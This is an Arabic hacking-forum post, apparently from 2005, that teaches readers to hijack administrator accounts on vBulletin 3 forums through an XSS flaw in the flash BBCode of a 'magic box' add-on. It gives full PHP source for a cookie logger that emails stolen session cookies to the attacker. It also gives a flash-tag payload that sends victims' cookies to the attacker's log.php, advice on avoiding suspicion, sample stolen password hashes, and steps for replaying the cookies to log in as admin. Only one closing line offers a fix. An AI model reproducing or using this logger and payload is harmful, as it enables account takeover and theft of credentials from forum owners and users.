مشاركة رقم :
1
 في 05-Nov-2005 الساعة :
11:22 PM
|
 | المنتدى : اختراق المواقع والمنتديات"> اختراق المواقع والمنتديات  شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي<< تم ترقيع مياسه
بسم الله الرحمن الرحيم
والصلاة والسلام على أشرف خــلق الله
سيدنا وحبيبنا محمد وعلى آله وصحبه أجمعين..
وبعد...
بمناسبه عيد الفطر السعيد
وعودتي على اعضاء منتديات مياسه
يشرفني بأني اشرح اقوى ثغرات المنتديات
من نوع فيبولتين vb المعروفه والجميله جدا
ويتميز هذا النوع من المنتديات بسهوله استعماله
وكثرت الهاكات التي تركب به الجميله جدا
ومن اجمل الهاكات هو الصندوق السحري و الماسي
ولكن مافي شئ كـامل الا الله سبحان وتعالى
وفي هذا النصدوق السحري يوجد ثلاث ثغرات
وهم:- ثغره الفلاش ثغره الريل بلاير ثغره تنسيق القصيده
وهي من اكتشاف اخونا العزيز: العنــدليب
وهم من نوع xss
نبدأ الشرح
ولكـن قبـل لا ابدأ الشرح
يــاليت تقرأ هذه العباره:-
" أقســم باللــه أني ما أستخدم الثغره على المنتديات العربيه
والاسلاميه"
اللهم قد بلغت اللهم فشهد
اللهم قد بلغت اللهم فشهد
اللهم قد بلغت اللهم فشهد
بسم الله نبدأ
مذا تحتاج الثغره:-
لوجو مبرمج بلغه الـ php
واخوانا ديفل مبرمج php
ماقصر سوالنا لوج قوي جدا
| كود PHP | <?php
/* S4aLog v1.0 [ Beta ]
-----------------------
**Beta Of S4aLog v1.0 With Str_Repalce <;>
! You Can Get ******* And Refresh The Broweser ! v0.10
[ New New New ]
!Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=*******
[ MSG ]
Name : Attack1
******* : *******
Refresh : http://www.s4a.xx
[ MSG ]!
!
Get ******* Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;
!
[ New New New ]
*/
$YourMail = " -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة -"; // Your E-mail
/*-----------------------*/
$Ip = $REMOTE_ADDR;
$Cooki_e = $_GET['id'];
$NameOfAttack = $_GET['nm'];
$Refresh = $_GET['re'];
/* Start */
$Replace******1 = array("=",";");
$Replace******2 = array("[ "," ] ");
$Cooki_e = str_replace($Replace******1,$Replace******2,$Cooki_e); // Replace
/* e.x hash=0210; | hash[0210]*/
//***************************************//
$Hdr = "From: S4aLog <log- -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة ->";
$Msg =
"
Mr Attacker ;) ,,, S4aLog v1 Beta <<
[ ".$NameOfAttack." ] ,, Name Of Attack
[ ".$Refresh." ] ,, Refresh Page
[ ".$Ip." ] ,, Ip
[ S4aLog < By Devil-00 > -- Thnx For -- <System Evil> <xxx (hacker)> <s4a Members> ]
[ -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة - - -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة - ]
-----------------------------------------------
****** ::
".$Cooki_e."
";
/* ------------------------------------------------------------------------- */
$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);
/************************************************** ***************************/
if($Send){
if($Refresh <> ""){header("location:".$Refresh);}
}
?> |
اعمل التغييرات الاتيه:-
YourMail = " -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة -"; // Your E-mail
وضع اميلك بداله
والتغيير الثاني هو
كلمه
C o o k i e
وهي تخرج على هيئئه 6 نجوم
******
غيرها
وضع كلمه
C o o k i e
ولكن ازل المسافات بين الاحرف
لكي تكون كلمه واحده بدون مسافات
لكي يكتمل اللوج عندنا
وبعد التعديل اعمل على المفكره عندما تنسخ كود اللوج
واحفظه بأسم log
وغير الامتداد الى php
وارفع اللوج على موقعك الشخصي
او اي موقع يقبل php
والحين نجرب مع بعض على طريقه استغلال الثغره
وراج اجرب على ثغره الفلاش لانها الاسهل
على المبتدئين
هذا كود الثغره
| كود PHP | [flash=http://www.xxxxxx.com/test.swf]onmouseover='alert(****************);'[/flash]
|
والان نأتي بربط كود الثغره بملف فلاشي
لكي نخدع به صاحب المنتدى او اي مشرف من المشرفين
والربط بيكون على الشكل التالي:-
| كود PHP | [flash=http://www.xxxx.com/card/x/swf/n.swf]onmouseover='location.href="http://www.xxx.com/log.php?nm=al-battar.net&re=http://www.xxxx.com/vb/showthread.php?t=1245&id="+****************'[/flash
|
والحين يا شطار ندخل في المتغيرات:_
اولاً:-
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
نغيره الى اي ملف فلاشي
وينصح بملف صغير الحجم
لكي لا تنكشف ويتخرب شغلك
ثانياً:-
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
هنا غير الرابط هذا
برابط اللوج الذي رفعته على موقعك
بعد عمليه التعديل
ثالثاً:-
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
هذا ياشباب مهم يعني مثلا اى واحد يمر المآوس قدام الفلاش راح يودييه للصفحه الموجوده بالكود
وانا انصحك تحط يرجع لنفس الصفحه الموجود فيها الفلاش عشان لا يشك الضحيه
ونشكر اخونا ديفيل لان طور اللوجو لان اول لوجو لامريت المآوس يوديك لصفحه بيضه
يعني نغير الرابط هذا
الى اي رابط موضوع
وينصح برابط الموضوع نفسه
وجزاه الله خير دع الخياار لناااا الله يوفقه في الوجو الجديد ( المطور )
ملإحظه ( إكيد بعضكم يبي يقول شلؤن اعرف انه هذا الكوكيز لاى منتدى )
اجابة السؤال ( الخيآر الثالث بالكوكيز وهى الصفحه المراد الذهاب لها بعد مررو مآوس الضحيه امام الفلاش
راح تجيك داخل الرساله وجذى تعرف لاى منتدى هذا الكوكيز )
الحين هذى شكل الرساله اللى راح توصلك ( بهذا الشكل )
****** ::
bbsessionhash[ 6b0edfdfsfd3ffbe27bc928936aba42f3523efa ] bblastvisit[ 1119817asd013 ]
bblastactivity[ 11198as17959 ] bbforum_view[
3523e417e8fb0bc834d2abaf8f9eb54cax1x-ix2yix1119817237y_ ] bbthread_lastview[
cf56fed12e97ac29c33812245fe8e28aax1x-ix1985ysx10x\"1111907592\"y_ ] bbuserid[
6224 ] bbpassword[ 9360b6686129d3d676df4e6974e8f730
المهم بالرساله كله التالى
bbpassword
bbuserid
bblastactivity
bblastvisit
واكيد لازم تكون مسجل بالمنتدى اللى ودك تدخل بنك الادمن فيه
الحين نطلع اللى نبيه من الكوكيز اللى وصل لنا بالإيميل
الباسوورد المشفر
bbpassword
9360b6686129d3d676df4e6974e8f730
رقم العضويه
bbuserid
1
bblastactivity
1119817959
bblastvisit
1119817013
الآن إفتح برنامج الكوكيز
واللى ماعنده يحمله من هالراابط
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
والان بعد ما استهدفنا الادمن الي نبي ندش بعضويته
وصلنا معلومات الكوكيز على الاميل
شوف الصوره
وبعد ما حملنا البرنامج محرر الكوكيز
نفتح ونغير المعلومات الي معلومات
التي وصلتلنا على الاميل
ملاحظه ( bb مو بكل المنتديات تبدآ بكل كلمه مثلا منتديات تبدآ بـ rr شيء عـآدى )
والآن بعد التعديل إغلق البرنامج واذهب للمتصفح واذهب للمنتدى سوف ترى انك
اصبحت ادمن كماا بالصوووره
تمت التجربه على عده منتدياات بنجااااح
والثغره لازالت شغاله واستغلالهاا سهل مثل ماتشووفوون
الترقيع
كلمة C o o k i e مع مراعات حذف المسافات بين الحروف اجعلها من ظمن الكلمات الممنوعة طبعا لاتنسى التفعيل وخلاص الحين تقفلت الثغرة
ولكم خالص تحيه
لا تـنسونا بالدعــاء
وانتظروا الجديد دائما على منتديات مياسه
والافضل بإذن الله قريب
والثغره إهذاء الى الاخ سكادا
وصقر البوادي
ومشرفين مياسه والاداريين واعضائها
وتم اغلاق هذه الثغره من منتديات مياسه
ولله الحمد
واي شئ تطور ابلغكم انشالله
تقبلو تحياتي
اخوكم:-
مــاجد
|
| الملفات المرفقة | |
تحذير : يتوجب عليك فحص الملفات للتأكد من خلوها من الفيروسات والمنتدى غير مسؤول عن أي ضرر ينتج عن إستخدام هذا المرفق . | 
تحميل الملف
|
إسم الملف : اللوق مه كيفيه الربط.rar
نوع الملف: rar 
حجم الملف : 1.2 كيلوبايت
المشاهدات : 48
| |
|
|
آخر 10 مشاركات
